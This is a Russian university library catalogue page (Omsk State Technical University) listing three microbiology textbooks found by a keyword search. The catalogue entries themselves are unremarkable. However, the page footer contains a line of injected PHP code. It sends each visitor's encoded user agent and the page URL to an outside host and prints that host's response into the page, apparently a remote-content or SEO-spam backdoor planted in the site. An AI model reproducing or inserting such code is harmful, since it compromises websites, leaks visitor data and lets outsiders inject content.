Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

51 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПАТОГЕННЫЙ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 3
1. 
Тюменцева, Евгения Юрьевна. Основы микробиологии [Текст] / Е. Ю. Тюменцева, 2015. - 122 с.
Держатели документа (Информация об экземплярах) 

Цель пособия - помочь студентам в более глубоком и осознанном усвоении учебной программы курса "Основы микробиологии" через практические занятия в лаборатории.

В данном пособии приведены основные понятия по дисциплине "Основы микробиологии", цель лабораторных работ, материалы и реактивы, методика выполнения лабораторных работ.

Учебное пособие подготовлено в соответствии с Федеральным государственным образовательным стандартом и действующей программой по направлению подготовки 100800.62 Товароведение, 260800.62 Технология продукции и организация общественного питания.

Пособие предназначено для студентов факультета экономики и сервисных технологий, обучающихся на дневной и заочной формах обучения, а также всем, кто интересуется методикой выполнения исследований по микробиологии.

Полный текст
2. 
Тюменцева, Евгения Юрьевна. Основы микробиологии [Электронный ресурс] / Е. Ю. Тюменцева, 2015. - 1 r=on-line. - 122 с.
Держатели документа (Информация об экземплярах) 

Цель пособия - помочь студентам в более глубоком и осознанном усвоении учебной программы курса "Основы микробиологии" через практические занятия в лаборатории.

В данном пособии приведены основные понятия по дисциплине "Основы микробиологии", цель лабораторных работ, материалы и реактивы, методика выполнения лабораторных работ.

Учебное пособие подготовлено в соответствии с Федеральным государственным образовательным стандартом и действующей программой по направлению подготовки 100800.62 Товароведение, 260800.62 Технология продукции и организация общественного питания.

Пособие предназначено для студентов факультета экономики и сервисных технологий, обучающихся на дневной и заочной формах обучения, а также всем, кто интересуется методикой выполнения исследований по микробиологии.

Полный текст
3. 
Мудрецова-Висс К. А. Основы микробиологии [Текст] / К. А. Мудрецова-Висс, В. П. Дедюхина, Е. В. Масленникова, 2015. - 383 с.
Ключевые слова 
МИКРОБИОЛОГИЯ -- БАКТЕРИИ -- ВИРУС - МИКРОБИОЛОГИЯ -- ФАГИ -- ГРИБЫ - МИКРОБИОЛОГИЯ -- ДРОЖЖИ - МИКРОБИОЛОГИЯ -- МИКРООРГАНИЗМЫ -- ПРОЦЕСС БИОХИМИЧЕСКИЙ -- ПРОЦЕСС АНАЭРОБНЫЙ -- ПРОЦЕСС АЭРОБНЫЙ -- ФАКТОР АБИОТИЧЕСКИЙ -- ФАКТОР БИОТИЧЕСКИЙ -- МИКРООРГАНИЗМ ПАТОГЕННЫЙ -- ИНФЕКЦИЯ ПИЩЕВАЯ -- ОТРАВЛЕНИЕ ПИЩЕВОЕ -- ПРОФИЛАКТИКА ПИЩЕВЫХ ЗАБОЛЕВАНИЙ -- КОНТРОЛЬ МИКРОБИОЛОГИЧЕСКИЙ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- МИКРОФЛОРА ПОЧВЫ -- МИКРОФЛОРА ВОДЫ -- МИКРОФЛОРА ВОЗДУХА -- МИКРОФЛОРА ТАРЫ -- МИКРОФЛОРА УПАКОВОЧНЫХ МАТЕРИАЛОВ -- МИКРОФЛОРА ТЕЛА ЧЕЛОВЕКА -- МИКРОБИОЛОГИЯ МОЛОКА -- МИКРОБИОЛОГИЯ МОЛОЧНЫХ ПРОДУКТОВ -- МИКРОБИОЛОГИЯ МЯСА -- МИКРОБИОЛОГИЯ КОЛБАСНЫХ ИЗДЕЛИЙ -- МИКРОБИОЛОГИЯ ЯИЦ -- МИКРОБИОЛОГИЯ ЯИЧНЫХ ПРОДУКТОВ -- МИКРОБИОЛОГИЯ РЫБЫ -- МИКРОБИОЛОГИЯ РЫБОПРОДУКТОВ -- МИКРОБИОЛОГИЯ КРУПЫ -- МИКРОБИОЛОГИЯ МУКИ -- МИКРОБИОЛОГИЯ МАКАРОННЫХ ИЗДЕЛИЙ -- МИКРОБИОЛОГИЯ ХЛЕБА -- МИКРОБИОЛОГИЯ ОВОЩЕЙ -- МИКРОБИОЛОГИЯ КОНДИТЕРСКИХ ТОВАРОВ -- МИКРОБИОЛОГИЯ ВКУСОВЫХ ТОВАРОВ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- ПРЯНОСТИ -- СОЛЬ ПОВАРЕННАЯ -- МИКРОБИОЛОГИЯ КУЛИНАРНЫХ ИЗДЕЛИЙ -- МИКРОБИОЛОГИЯ КОНСЕРВОВ -- ГИГИЕНА ПИЩЕВЫХ ПРОДУКТОВ -- САНИТАРИЯ - ТОРГОВЛЯ
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2875 - 24.04.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.91 с.12 запросов, 0.47c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;